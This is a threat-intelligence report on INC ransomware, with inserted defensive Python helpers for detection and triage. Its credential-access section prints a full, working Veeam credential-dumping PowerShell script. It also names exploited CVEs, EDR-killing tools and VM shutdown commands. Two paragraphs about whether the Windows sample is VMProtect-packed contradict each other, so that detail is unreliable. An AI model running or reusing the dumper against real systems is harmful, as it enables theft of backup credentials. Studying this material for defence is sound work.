From emerging threat to top-tier ransomware-as-a-service: The evolution of INC ransomware
Author: Darrel Virtusio
Summary
- INC has evolved from an emerging ransomware-as-a-service (RaaS) operation into one of the most active ransomware groups in 2026, claiming more than 800 victims since 2023.
- The disruption of LockBit and the shutdown of BlackCat created opportunities for INC to expand as affiliates migrated to alternative ransomware operations.
- Both the Windows and Linux/ESXi encryptors have been rewritten in Rust, enabling cross-platform development and increasing analysis complexity.
- Recent incidents reveal updated tooling, including a modified credential dumper capable of targeting newer Veeam backup deployments. The updated tool supports Veeam’s newer salted DPAPI credential encryption method, which suggests that INC operators continuously refine their tooling.
- INC’s influence extends beyond its own operations. Following the 2024 sale of its source code, related ransomware families such as Lynx and Sinobi emerged with significant code overlap.
- United States organizations account for more than 65% of listed victims, with legal services, manufacturing, construction, technology and health care among the most targeted sectors.
- This report examines INC’s evolution, attack chain, tooling, victimology and the latest tactics, techniques and procedures (TTPs) observed in recent intrusions.
Introduction
Modern ransomware attacks disrupt business
operations, expose sensitive data, and cause substantial financial, operational
and reputational damage. Despite continued investments in security controls,
ransomware groups continue to evolve their tactics through
ransomware-as-a-service (RaaS) models that lower the barrier to entry for
affiliates and enable attacks at scale.
Among today’s most active RaaS operations,
INC ransomware has rapidly established itself as a major threat. Since emerging
in 2023, the group has expanded its capabilities through the development of
Windows and Linux/ESXi ransomware variants, ongoing tooling improvements and a
growing affiliate ecosystem. INC has also been linked to multiple high-profile
incidents and has influenced the broader ransomware landscape through the sale
of its source code, which contributed to the emergence of related ransomware
families such as Lynx and Sinobi. In 2026 alone, the group has continued to add
hundreds of victims to its data leak site, placing it among the most active
ransomware operations globally.
In this report, the Acronis Threat Research
Unit (TRU) examines the evolution of INC ransomware, its attack chain,
victimology, tooling and recent tactics, techniques and procedures (TTPs). We
also analyze the group’s Windows and Linux/ESXi payloads, highlight notable
developments observed in recent incidents and provide detection, mitigation and
risk-reduction recommendations to help organizations defend against this
growing ransomware threat.
Background and history
Discovered in mid-2023, INC ransomware is another RaaS group that employs double extortion tactics, like most modern ransomware groups. It established itself as a semi-private, affiliate-based RaaS operation rather than a direct rebrand of an existing cybercriminal syndicate. Since its inception, it quickly gained reputation and notoriety by aggressively targeting high-profile organizations across multiple sectors, with the education and health care sectors hit particularly hard in its early stages.
Operationally, INC ransomware evolved quickly through 2023–2025. A Linux/ESXi variant appeared in the wild (ITW) within months, targeting VMware infrastructure and mirroring a broader shift among ransomware operations toward maximizing impact by encrypting hypervisors and the virtual machines they host, while the Windows variant was improved almost simultaneously. In its most recent iteration, both payloads have been rewritten in Rust, which makes analysis and detection harder while making cross-platform development and implementation easier.
Beyond improving its encryptor, INC
ransomware expanded its affiliations. In late 2024, Vice Society was observed deploying INC ransomware against the health care industry; this group has a long-standing habit
of cycling through third-party payloads such as BlackCat, Rhysida, Hello Kitty,
Zeppelin, and Quantum Locker. Additionally, following the disruption of LockBit
and the shutdown of BlackCat, several of their affiliates have reportedly migrated to INC.
INC’s source code also went up for sale. In May 2024, a forum user called “salfetka” listed the Windows and Linux/ESXi payloads on underground forums for $300,000, limited to three buyers. Notably, security researcher 3xp0rt mentioned that “salfetka” is linked to the aliases “rinc” and “farnetwork”, which are tied to the Nokoyawa, JSWORM, Nefilim, Karma and Nemty ransomware operations. Shortly after the listing, the Lynx ransomware operation emerged, showing substantial code overlap with INC. Sometime later, the Sinobi ransomware operation also appeared. INC’s evolution therefore branches at this point: the original brand continues to operate while elements of its codebase propagate into adjacent operations.
Victimology
INC
ransomware has had more than 800 victims since 2023. Its victims span globally
but it predominantly targets organizations from the United States and has many
notable victims from the past including NHS Scotland, Xerox and Texas State Bar,
among others.
Currently,
INC ransomware is involved in the top five breaches this year. In 2026, INC has
been consistently posting victims and has firmly established itself as one of
the top five most active ransomware groups globally this year.
As seen in the graph above, the United States accounts for 65.3% of all victims (as of this writing), with a long tail led by Australia, Canada, Germany and Taiwan. On the other hand, the complete absence of victims in the Commonwealth of Independent States (CIS) suggests that the operators are based in the CIS region and that their affiliate program requires affiliates to avoid attacking organizations within it.
INC ransomware’s sector targeting is broad-based. The top five targets for 2026 are legal services, manufacturing, technology, health care and construction. Previously, the education sector was the main target of INC ransomware. Several things make law firms a valuable target for ransomware groups: the files they hold include settlement documents, case files, NDAs and many similar documents. When leaked, these can trigger malpractice claims and lawsuits from clients on top of reputational damage, which adds even more pressure to pay the ransom.
Targeting also shifts by region. U.S. victims
cluster in regulated, privacy-sensitive industries (legal and health care) that
often carry insurance. Outside the U.S., victims are more widespread in sectors
like technology, manufacturing, construction and others. This suggests that the
focus is on high-pressure U.S. industries that are more likely to pay, and a
broader, less selective one everywhere else.
Campaign overview
INC ransomware attack chain
INC
ransomware affiliates utilize a diverse range of tools and techniques in
targeting victims. In their latest campaigns, they continue to target unpatched
edge devices for initial access, dump credentials from Veeam backup servers and
use a mix of LOLBins and commercial RMM tools to move through victim networks. The sections below walk through
the tactics we’ve observed across recent incidents, mapped to the stages of the
attack chain.
Initial access
INC
ransomware is known to gain access to their target victims through spear phishing,
valid account credentials from Initial Access Brokers (IAB) and exploitation of
vulnerabilities in public-facing applications such as CVE-2023-3519 (Citrix
Netscaler), CVE-2023-48788 (Fortinet EMS), CVE-2024-57727 (SimpleHelp RMM) and
CVE-2025-5777 (Citrix Bleed 2).
Discovery
After gaining access, INC ransomware actors have been observed across multiple incidents performing discovery with ping and net commands run through cmd.exe. Besides built-in commands, they have also used tools such as Angry IP Scanner, Advanced IP Scanner and netscan, seen at the following paths:
C:\Program Files\Angry IP Scanner\ipscan.exe
\\10.2.2.202\c$\Software\Advanced_IP_Scanner_2.5.3850.exe
C:\ProgramData\VMware\libsm2\netscan.exe
Credential access
In recent INC ransomware incidents, we observed the actors extracting sensitive credentials by launching a Base64-encoded PowerShell script through cmd.exe:
cmd.exe /Q /c powershell.exe -e JABTAHEAbABEAGEAdABhAGIAYQBzAGUATgBhAG0AZQAgAD0AIAAiAFYAZQBlAGEAbQBCAGEAYwBrAHUAcAAiAAoAJABTAHEAbABTAGUAcgB2AGUAcgBOAGEAbQBlACAAPQAgACIAVgBCAC0ASABWADIAIgAKACQAUwBxAGwASQBuAHMAdA…
The decoded script is a Veeam credential dumper. It is a modified version of the open-source Veeam-Get-Creds.ps1 script found on GitHub.
$SqlDatabaseName = "REDACTED"
$SqlServerName = "REDACTED"
$SqlInstanceName = "REDACTED"
$b64Salt = ""

# Forming the connection string
$SQL = "SELECT [user_name] AS 'User', [password] AS 'Password', [description] AS 'Description' FROM [$SqlDatabaseName].[dbo].[Credentials] WHERE password <> ''" # Filter empty passwords
$auth = "Integrated Security=SSPI;" # Local user
$connectionString = "Provider=sqloledb; Data Source=$SqlServerName\$SqlInstanceName; Initial Catalog=$SqlDatabaseName; $auth;"
$connection = New-Object System.Data.OleDb.OleDbConnection $connectionString
$command = New-Object System.Data.OleDb.OleDbCommand $SQL, $connection

# Fetching encrypted credentials from the database
try {
    $connection.Open()
    $adapter = New-Object System.Data.OleDb.OleDbDataAdapter $command
    $dataset = New-Object System.Data.DataSet
    [void] $adapter.Fill($dataSet)
    $connection.Close()
}
catch {
    Write-Host "Can't connect to DB! Exiting..."
    exit -1
}
$output = ($dataset.Tables | Select-Object -Expand Rows)
if ($output.count -eq 0) {
    Write-Host "No passwords found!"
    exit
}
Add-Type -assembly System.Security

# Decrypting passwords using DPAPI
$output | ForEach-Object -Process {
    $EncryptedPWD = [Convert]::FromBase64String($_.password)
    $enc = [system.text.encoding]::Default
    try {
        # Decrypt password with DPAPI (old Veeam versions)
        $raw = [System.Security.Cryptography.ProtectedData]::Unprotect(
            $EncryptedPWD, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine
        )
        $pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
    } catch {
        try {
            # Decrypt password with salted DPAPI (new Veeam versions)
            $salt = [System.Convert]::FromBase64String($b64Salt)
            # Hex-encode the blob, strip the fixed 74-character prefix, then rebuild the byte array
            $hex = New-Object -TypeName System.Text.StringBuilder -ArgumentList ($EncryptedPWD.Length * 2)
            foreach ($byte in $EncryptedPWD) {
                $hex.AppendFormat("{0:x2}", $byte) > $null
            }
            $hex = $hex.ToString().Substring(74, $hex.Length - 74)
            $EncryptedPWD = New-Object -TypeName byte[] -ArgumentList ($hex.Length / 2)
            for ($i = 0; $i -lt $hex.Length; $i += 2) {
                $EncryptedPWD[$i / 2] = [System.Convert]::ToByte($hex.Substring($i, 2), 16)
            }
            $raw = [System.Security.Cryptography.ProtectedData]::Unprotect($EncryptedPWD, $salt, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
            $pw_string = $enc.GetString($raw) -replace '\s', 'WHITESPACE_ERROR'
        } catch {
            $pw_string = "COULD_NOT_DECRYPT"
        }
    }
    $_.user = $_.user -replace '\s', 'WHITESPACE_ERROR'
    $_.password = $pw_string
    $_.description = $_.description -replace '\s', 'WHITESPACE_ERROR'
}
Write-Output $output | Format-Table -HideTableHeaders | Out-String -Width 10000
The modified version operates by adding
support for the newer Veeam credential encryption method that uses salted
DPAPI. Unlike the original version, which automatically pulls database
connection settings from the registry, the updated script uses hardcoded SQL
server, instance and database values, which suggests it was adapted for a
specific target environment. It also introduces a fallback decryption routine
for newer encrypted credential blobs, improves error handling and description
metadata, and formats output more cleanly for automation or parsing.
Ultimately, the updated script is more reliable, more compatible with modern
Veeam deployments and designed for operational use.
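The encoded-command launch shown above is cheap to catch in process-creation telemetry. The following Python helper is an added example written for readers of this report; it is not Acronis's or INC's code. It decodes a PowerShell -e/-EncodedCommand argument (Base64 over the UTF-16LE text of the script) and checks the decoded script for strings that the modified Veeam-Get-Creds.ps1 above necessarily contains. The indicator strings are taken from that script; the sample command lines, including the two-line stand-in for the dumper's query-plus-DPAPI structure, are constructed for the example.

```python
import base64

# Substrings in the decoded script that point at Veeam credential-store access.
# All three appear in the modified Veeam-Get-Creds.ps1 shown above.
VEEAM_CREDENTIAL_INDICATORS = (
    "[dbo].[Credentials]",
    "ProtectedData]::Unprotect",
    "DataProtectionScope]::LocalMachine",
)


def is_encoded_flag(token: str) -> bool:
    """True for -e, -ec, -enc, ... -EncodedCommand (PowerShell accepts any such prefix)."""
    t = token.lstrip("-/").lower()
    return t.startswith("e") and "encodedcommand".startswith(t)


def decode_encoded_command(cmdline: str):
    """Return the script carried by powershell -e <base64>, or None if there is none.

    -EncodedCommand is Base64 over the UTF-16LE bytes of the script, so the blob
    must be decoded as utf-16-le rather than utf-8.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            try:
                raw = base64.b64decode(tokens[i + 1].strip('"\''), validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage_command_line(cmdline: str) -> dict:
    """Decode an encoded PowerShell payload and list the Veeam indicators it contains."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "hits": [], "script": None}
    lowered = script.lower()
    hits = [s for s in VEEAM_CREDENTIAL_INDICATORS if s.lower() in lowered]
    return {"encoded": True, "hits": hits, "script": script}


def encode_for_powershell(script: str) -> str:
    """Produce the Base64 form PowerShell expects; used here only to build sample log lines."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation command lines (not real telemetry). The first one
# wraps a two-line stand-in for the dumper's structure: the credential query and the DPAPI call.
_DUMPER_STANDIN = (
    "$SQL = \"SELECT [user_name], [password] FROM [VeeamBackup].[dbo].[Credentials]\"\n"
    "$raw = [System.Security.Cryptography.ProtectedData]::Unprotect($blob, $null, "
    "[System.Security.Cryptography.DataProtectionScope]::LocalMachine)\n"
)
SAMPLE_COMMAND_LINES = [
    "cmd.exe /Q /c powershell.exe -e " + encode_for_powershell(_DUMPER_STANDIN),
    "powershell.exe -NoProfile -EncodedCommand " + encode_for_powershell("Get-Date\n"),
    "cmd.exe /c ping -n 1 10.2.2.202",
]


def scan(lines):
    """Return (line index, hits) for every command line whose decoded payload matches."""
    findings = []
    for idx, line in enumerate(lines):
        result = triage_command_line(line)
        if result["hits"]:
            findings.append((idx, result["hits"]))
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_COMMAND_LINES):
        print(f"line {idx}: Veeam credential-dump indicators {hits}")
```

Because the match runs on the decoded text, it is unaffected by how the Base64 blob is split or cased in the log. Pairing it with process ancestry (cmd.exe /Q /c spawning powershell.exe on a Veeam backup server) keeps false positives from legitimate encoded commands low.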
Lateral movement
To move
laterally within the victim’s environment, INC ransomware actors use
living-off-the-land binaries (LOLBins), including remote desktop protocol (RDP)
and PsExec, to access and execute commands on other systems in the network.
Defense impairment
In recent incidents, INC ransomware actors
have used different tools to kill EDRs. In one case, they used a Sysinternals
utility named PsKill that terminates local or remote processes by PID or
process name.
\\?\B:\[REDACTED]\Scripts\PSTools\pskill.exe
In another case, the actors deployed a custom
process terminator that drops vulnerable drivers (filwfp.sys, filnk.sys,
fildds.sys) and installs them as a service. The tool accepts a -p parameter
followed by the PID or process name to terminate, similar to PsKill.
Sample execution:
ProcessTerminator.exe -p
Command and control
We have observed a mix of red team and commercially available remote access tools. Across different incidents, Cobalt Strike, AnyDesk, ScreenConnect and TeamViewer were used by INC ransomware actors. These tools are favored by many ransomware groups because they blend into legitimate IT activity in logs and provide a reliable command-and-control (C2) channel.
Exfiltration
INC
ransomware actors compress and password-protect the staged data with 7-Zip,
then upload the archives to attacker-controlled cloud storage using rclone.
Many ransomware groups use rclone because the same binary works with dozens of
cloud providers, so operators can pick whichever destination the victim’s
firewall is least likely to block.
Impact
After staging and exfiltrating the data, INC ransomware
actors run the encryptor across the environment. The ransomware payload
behavior is highly configurable and is dictated by command-line arguments
entered by the operator at execution.
- Multithreaded efficiency: To maximize data destruction speed, the malware utilizes multithreading, automatically spawning a total thread count equal to the host’s number of processors, multiplied by four.
- Partial encryption modality: The payload employs a tiered partial encryption routine based on file size to accelerate the process.
- Exclusion lists: The algorithm deliberately avoids critical system files and directories to ensure the host remains functional enough to display the extortion message, skipping extensions like .msi, .exe, .dll, and .inc, as well as folders such as Windows, Program Files, appdata, and $RECYCLE.BIN.
Infrastructure and extortion tactics
INC
Ransomware manages a distinct infrastructure designed to maximize pressure
through double extortion:
- Dual-site strategy: The group operates two separate web platforms. The first is a private negotiation site requiring unique credentials provided to the victim to act as a secure communication channel. The second is a publicly accessible leak site used to publish exfiltrated corporate data if compliance is refused.
- Network printing routines: Upon successful encryption, the malware modifies the host’s desktop wallpaper to display the extortion demands and drops both .txt and .html versions of the INC-README note. Additionally, the payload scans the compromised network for active printers and automatically transmits commands to physically print hard copies of the ransom instructions.
Technical analysis
Windows
The ransomware sample is a 64-bit
Windows Portable Executable (PE64) compiled within a Microsoft Visual C/C++
environment. Crucially, the binary is heavily packed and protected by VMProtect
(version 3.X), introducing advanced structural obfuscation designed to severely
hinder reverse engineering. This protection layer virtualizes the core
instructions into a randomized, proprietary bytecode format while concealing
the import address table (IAT) to mask system API interactions. Consequently,
traditional static analysis is heavily obstructed, requiring dynamic debugging
or specialized unpacking procedures to uncover the payload’s underlying
encryption routines and configurations.
While initial automated heuristics
flag the payload as packed due to elevated file-wide data density, detailed
sectional entropy analysis confirms that all individual segments retain a
native, unpacked status. This structural layout — combined with a fully exposed
IAT — verifies that the threat actors did not employ binary encapsulation or
code virtualization to shield the malware. Instead, the raw executable
instructions are entirely uncovered, allowing for immediate static mapping of
the binary’s core subroutines and system API loops.
Execution
Initial disassembly of the INC
ransomware payload reveals a highly structured, native-execution profile
comprising 4,248 distinct functions. Unlike heavily armored or packed variants
that completely conceal their structural dependencies, this sample maintains a
fully intact and exposed IAT featuring standard Windows administrative
subroutines from KERNEL32.dll and ADVAPI32.dll, as well as cryptographic
primitives such as BCryptGenRandom. This un-obfuscated layout indicates that
the ransomware relies directly on native operating system subsystems to manage
its execution environment right out of the gate.
Immediately following environment
initialization, the malware invokes GetCommandLineW to retrieve the complete
execution string passed by the operator. By querying this API early in its life
cycle, the binary prepares to evaluate runtime constraints and parameters,
ensuring that any operator-specified configurations are integrated into the
execution flow prior to the deployment of any defensive evasion or encryption
subroutines.
The payload initiates its persistence
routine by invoking OpenSCManagerW with an explicit 0xF003F
(SC_MANAGER_ALL_ACCESS) access mask. This specific configuration confirms that
the current execution branch demands full, unrestricted administrative privileges
(such as a local administrator or SYSTEM security context) to gain complete
control over the Service Control Manager database prior to executing subsequent
service installation or configuration modifications.
The analysis of the payload’s
process-handling subroutines reveals a fully orchestrated, synchronous
termination sequence designed to forcefully eliminate resource-locking
applications. The malware passes target process IDs (PIDs) directly to
OpenProcess using a high-privilege access mask (dwDesiredAccess) to obtain a
valid task handle.
Upon verifying the handle’s validity via internal register
checks (rax), the binary directly executes TerminateProcess to kill the targeted
application workspace instantly. Notably, successful termination branches into
a dedicated execution-logging block that references a hardcoded string literal
at off_5C6DC0 (“Successfully killed process: \n”). The inclusion of
this verbose text instrumentation confirms the presence of an active debugging
or feedback architecture that tracks deployment metrics in real time.
To maximize the scope of its
deployment, the payload initiates a systematic discovery loop targeting all
connected storage infrastructure. As demonstrated via static analysis, the
malware dynamically constructs standard root path strings inside a local buffer,
iterating sequentially through the alphabet. It passes each generated path to
GetDriveTypeW for evaluation of the underlying storage medium. By filtering the
numeric type codes returned by the operating system, the binary identifies
active volumes, distinguishing between local fixed disks, removable media and
mapped network shares.
To interface with low-level system
drivers, the payload contains specialized routines designed to issue direct
requests to the Windows kernel. Static analysis isolates an execution block
utilizing the DeviceIoControl API. Immediately preceding the call, the malware
initializes the edx register (which dictates the dwIoControlCode parameter)
with the explicit control code 0x53C028 (rendered contextually by the
disassembler as an offset expression relative to loc_53C026). By dispensing
this specific IOCTL command to an active device handle, the ransomware
communicates directly with underlying storage drivers or file-system filters,
potentially attempting to bypass volume restrictions or disable endpoint
security controls before deploying its encryption threads.
Upon successful driver
reconfiguration, the control flow falls through to a diagnostic block
referencing the cleartext string literal “Successfully deleted shadow
copies from ” (off_5C6468), confirming a quiet execution before releasing
its temporary tracking structures back to the operating system using HeapFree.
This command-line interface
demonstrates that the binary is an internally driven, operator-configurable
tool designed for hands-on, human-operated network deployments.
Rather
than executing blindly, the malware gives the attacker precise tactical
controls: allowing them to dynamically filter target software (like backup
engines, Veeam or SQL databases), execute silent anti-forensic passes (quiet)
or simulate deployment without breaking things (def).
The binary
contains an embedded, hardcoded array of specific folders within its data
segment that are explicitly ignored during execution. The array strictly
contains the strings windows, program files, appdata, $recycle.bin, programdata
and all users. During execution, the malware references these specific tokens
to identify and bypass core system folders and application configurations,
ensuring the operating system deployment environments remain stable while
traversing the file system.
Encryption
The contiguous string literals
extracted from the .rdata segment (EncryptionAlgo, SALSA20, AES and
EncryptionHeader) confirm that the payload employs a high-performance hybrid
symmetric / asymmetric encryption scheme. Rather than relying on a single
cryptographic primitive, the binary utilizes a multitiered architecture.
The discovery of curve25519-dalek
artifacts confirms that the ransomware implements modern Curve25519 Elliptic
Curve Cryptography (ECC) as its asymmetric layer to protect the symmetric keys
stored in the file footers. Additionally, the embedded /work/cargo/registry/…
dependency paths serve as a definitive compiler signature proving that the
payload was developed using the Rust programming language within a
containerized build pipeline.
Static analysis of the initialization
phase confirms that the ransomware implements dynamic thread-pool sizing based
on host hardware constraints. By invoking the native GetSystemInfo Windows API,
the binary retrieves the active dwNumberOfProcessors core count metric. The
compiler optimizes the thread allocation equation using an arithmetic
left-shift instruction (shl ebp, 2), effectively multiplying the detected core
count by four to establish the total concurrent worker thread capacity assigned
to downstream encryption tasks.
Assembly code inspection reveals that
the malware calls the native Windows CNG API, BCryptGenRandom, to obtain unique
16-byte initialization vectors (IVs) or cryptographic keys for file encryption.
The code explicitly sets up this call
by clearing the algorithm handle (ecx = 0) and setting the flags register (r9d
= 2), which invokes the BCRYPT_USE_SYSTEM_PREFERRED_RNG configuration. This
instructs the operating system to use its default, system-preferred random
number generator. By enforcing a strict length constraint of 16 bytes (r8d =
10h), the routine fills a local stack buffer with a 128-bit secure random
value, verifies a successful execution status (test eax, eax) and passes the
generated bytes directly to the downstream encryption engine.
Dynamic execution of the malware payload using the targeted "--file" configuration argument confirmed the payload’s dual-marking mechanism during testing. The .INC extension was appended to the modified filename on disk, and a hardcoded INC signature was observed at the absolute end of the encrypted file stream, to be used as a structural footer for the decryptor.
Linux/ESXi
The
ransomware sample is a 64-bit Linux Executable and Linkable Format (ELF64)
binary compiled as a position-independent shared object (DYN) under GCC (3.X).
Crucially, the binary does not exhibit signs of commercial packing or
virtualization layers, leaving standard structural profiling, string extraction
and code disassembly directly accessible. Although several PE analysis tools
identify this sample as being written in C or C++, the binary was actually
developed in Rust. This is supported by the presence of Rust-specific function
symbols, naming conventions, and embedded runtime strings within the
executable.
Command line
At the start of execution, the sample reads its command line arguments and compares them against a built-in list. The list can be obtained with the '-h' or '--help' arguments.

| Argument | Description | Action |
| --- | --- | --- |
| --daemon | Detach an application from the SSH connection, so you can close it and continue encryption | Forks into background via fork() and setsid() |
| --esxi | Shutdown ESXi virtual machines | Enumerates all virtual machines, shuts them down, and can delete snapshots |
| -h, --help | Prints help with information | Prints the arguments description |
| --motd | Replace the default Message of the day with a ransom note | Writes ransom note to /etc/motd file |
| -V, --version | Prints version information | Didn’t work |
| --delay | Delay encryption by N minutes | Sleep for N seconds before encrypting files |
| --dir | Encryption directory(ies) | Encrypt files only in the provided directory |
| --file | Encryption of file(s) | Encrypt provided files |
| --mode | Encryption mode (fast, medium, slow) | Select encryption speed, the default is medium |
| --skip | Skip virtual machines with given IDs separated by ‘ | Skip virtual machines only if --esxi argument was provided |
Ransom note extraction
After that,
it loads a string from a large, hard-coded data blob. Some of these strings
look like some execution logs and indicate files and folders encryption, ransom
note and error handling. At the end of this block, there is also a large Base64
string.
This Base64
encoded string is actually a ransom note. Decoded variants are saved in memory
for later usage.
ESXi targeting
When the sample is executed with the '--esxi' argument, it enters a function responsible for shutting down virtual machines.
At the start of this function, it loads a string blob into memory, extracts the first 7 characters and passes them to the Command::new function. The string extracted from the blob is 'vim-cmd', the VMware Infrastructure Management command-line tool. Next, it loads another string blob, this time taking the first 15 characters, which yields '/vmsvc/getallvms/'. It then executes the command, where 'vim-cmd' is the process that will be spawned and 'getallvms' is its argument.
This command returns a list of all virtual machines. Next, the sample loads an additional command in the same way, '/vmsvc/power.off', and passes the obtained list to it in order to shut down all running machines. This is done to ensure that running virtual machines do not block access to the ESXi files that must be encrypted.
Additionally, the --skip argument can be used to exclude specific virtual machines from processing. However, since the --esxi mode operates on all available VMs and the --skip parameter must be supplied when the sample is launched, the attacker must already know the target VM IDs before execution.
Message of the day
If the
‘–motd’ argument was provided, the attacker will write a previously decoded
ransom note to the ‘/etc/motd’ file. The contents of this file are displayed by
login after a successful login, but just before it executes the login shell,
for example, when an SSH session is established.
Encryption
The encryption process starts from
creating threads. The main thread will be responsible for file search, and the
other threads will be responsible for file encryption. All encryption threads
have ‘sub_55555541AD40’ starting address, and their number is dependent on the
number of logical processors in the system.
At the start of each encryption
thread, the sample generates 32 random bytes using the operating system’s
random number generator. These bytes are then passed to the clamp_scalar
function to transform them into a valid Curve25519/X25519 private scalar. The
clamped value is later used as an ephemeral private key for the X25519
algorithm. Based on this private key, the sample generates a corresponding
ephemeral public key. After generating the key pair, the sample loads a
hardcoded X25519 public key embedded in the binary. This key is stored in
Base64 format and most likely belongs to the attackers.
Using the
generated ephemeral private key and the embedded attacker’s public key, the
sample performs an Elliptic-Curve Diffie-Hellman (ECDH) operation to derive a
shared secret. The resulting shared secret is then converted into a raw byte
representation and hashed using the SHA-256 algorithm. The produced SHA-256
digest is used as a symmetric key material for AES-128 encryption.
The
sample initializes the AES-128 key schedule and prepares AES-CTR mode counters
and nonce values. During file encryption, the malware constructs sequential
counter blocks, encrypts them using AES-128 and uses the generated keystream to
XOR plaintext file data. This process is repeated block by block until the
entire target file is encrypted.
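The key flow described in the last three paragraphs can be followed end to end in Python. The block below is an added example, not code from the Acronis report or from the ransomware: it implements clamp_scalar and the X25519 ladder as RFC 7748 specifies them (standard library only), derives SHA-256 key material from the ECDH shared secret, and shows why the per-file key can be regenerated only by whoever holds the private half of the public key embedded in the binary. Which 16 bytes of the 32-byte digest become the AES-128 key is not stated in the report, so taking the first 16 is an assumption here; the "attacker" key pair is generated locally for the example rather than being the sample's embedded key, and AES-CTR itself is not implemented.

```python
import hashlib
import os

P = 2**255 - 19   # Curve25519 field prime
A24 = 121665      # (486662 - 2) / 4, the ladder constant from RFC 7748
BASE_POINT_U = 9


def clamp_scalar(raw32: bytes) -> int:
    """RFC 7748 clamping: what the sample's clamp_scalar does to its 32 random bytes."""
    k = bytearray(raw32)
    k[0] &= 248
    k[31] &= 127
    k[31] |= 64
    return int.from_bytes(k, "little")


def _cswap(swap: int, a: int, b: int):
    return (b, a) if swap else (a, b)


def x25519(scalar: int, u: int) -> int:
    """Montgomery ladder scalar multiplication on Curve25519 (RFC 7748 section 5)."""
    x1, x2, z2, x3, z3, swap = u, 1, 0, u, 1, 0
    for t in range(254, -1, -1):
        kt = (scalar >> t) & 1
        swap ^= kt
        x2, x3 = _cswap(swap, x2, x3)
        z2, z3 = _cswap(swap, z2, z3)
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb) % P) % P
        x2 = aa * bb % P
        z2 = e * ((aa + A24 * e) % P) % P
    x2, x3 = _cswap(swap, x2, x3)
    z2, z3 = _cswap(swap, z2, z3)
    return x2 * pow(z2, P - 2, P) % P


def decode_u(raw32: bytes) -> int:
    """Little-endian u-coordinate with the top bit masked, per RFC 7748."""
    b = bytearray(raw32)
    b[31] &= 127
    return int.from_bytes(b, "little")


def encode_u(u: int) -> bytes:
    return u.to_bytes(32, "little")


def public_key(private_scalar: int) -> bytes:
    return encode_u(x25519(private_scalar, BASE_POINT_U))


def derive_file_key(private_scalar: int, peer_public: bytes) -> bytes:
    """ECDH shared secret -> raw bytes -> SHA-256 -> AES-128 key material.

    Assumption: the first 16 bytes of the digest are used; the report only says the
    SHA-256 digest serves as AES-128 key material.
    """
    shared = encode_u(x25519(private_scalar, decode_u(peer_public)))
    return hashlib.sha256(shared).digest()[:16]


def encryptor_side(attacker_public: bytes):
    """What one encryption thread does: fresh ephemeral pair, then the file key.
    The ephemeral public key is what must travel with the file (in the footer)."""
    eph_private = clamp_scalar(os.urandom(32))
    eph_public = public_key(eph_private)
    return eph_public, derive_file_key(eph_private, attacker_public)


def decryptor_side(attacker_private: int, eph_public_from_footer: bytes) -> bytes:
    """The operator's side: the same key falls out of their long-term private scalar."""
    return derive_file_key(attacker_private, eph_public_from_footer)


if __name__ == "__main__":
    # Locally generated stand-in for the Base64 public key embedded in the binary.
    attacker_private = clamp_scalar(os.urandom(32))
    attacker_public = public_key(attacker_private)
    eph_public, file_key = encryptor_side(attacker_public)
    assert decryptor_side(attacker_private, eph_public) == file_key
    print("file key (recoverable only with the attacker's private key):", file_key.hex())
```

The practical consequence for responders: the ephemeral private scalar exists only in the encryptor thread's memory, so a live memory capture of a still-running encryptor is the only place the file key material could be found on the victim side; the footer alone, holding the ephemeral public key, does not suffice.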
Similar to the Windows variant, the Linux sample appends the ‘.INC’ extension to all encrypted files and writes a footer at the end of each file. The footer consistently begins with five 00 bytes followed by the constant value ‘50 0F’, which remains identical across all analyzed samples. After an additional ‘00’ byte, the next value appears to indicate the encryption mode used for the file. Observed values include:
- 0C = fast mode
- 04 = medium mode
- 01 = slow mode
The footer terminates with the ASCII string INC, which serves as a file marker or magic value identifying the ransomware family.
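For triage of an encrypted host, the footer layout above is enough to confirm the family and read back the encryption mode without any key. The parser below is an added example, not the report's or the ransomware's code: it checks the trailing INC magic, locates the 00 00 00 00 00 50 0F 00 prefix and maps the following byte to fast/medium/slow. The bytes between the mode byte and the magic are kept opaque because the report does not describe them; the sample file images are constructed in memory for the example.

```python
MODE_BY_BYTE = {0x0C: "fast", 0x04: "medium", 0x01: "slow"}  # from the report's footer analysis
FOOTER_PREFIX = b"\x00" * 5 + b"\x50\x0f\x00"                  # five 00 bytes, 50 0F, then 00
MAGIC = b"INC"                                                 # ASCII marker at the very end
EXTENSION = ".INC"


def parse_inc_footer(data: bytes):
    """Return footer details for an INC-encrypted file image, or None if the marker is absent."""
    if not data.endswith(MAGIC):
        return None
    # The prefix starts with a run of zeros, so rfind lands on the last five zeros before
    # 50 0F, which is where the report says the footer begins.
    off = data.rfind(FOOTER_PREFIX, 0, len(data) - len(MAGIC))
    mode_pos = off + len(FOOTER_PREFIX)
    if off < 0 or mode_pos >= len(data) - len(MAGIC):
        return None
    mode_byte = data[mode_pos]
    return {
        "mode": MODE_BY_BYTE.get(mode_byte, "unknown"),
        "mode_byte": mode_byte,
        "footer_offset": off,
        # Layout between the mode byte and the magic is not documented in the report; keep it raw.
        "opaque": data[mode_pos + 1:-len(MAGIC)],
    }


def triage_file(name: str, data: bytes) -> dict:
    """Combine the extension check with the footer check for one file."""
    footer = parse_inc_footer(data)
    return {
        "name": name,
        "has_inc_extension": name.endswith(EXTENSION),
        "footer_present": footer is not None,
        "mode": footer["mode"] if footer else None,
        "ciphertext_length": footer["footer_offset"] if footer else None,
    }


def _constructed_sample(mode_byte: int, body: bytes) -> bytes:
    """Build a file image with the documented footer shape; the undocumented area is filled with 0xAA."""
    return body + FOOTER_PREFIX + bytes([mode_byte]) + b"\xaa" * 40 + MAGIC


# Constructed in-memory samples, not real encrypted files. The first body deliberately starts
# with a run of zeros to show that rfind still finds the real footer.
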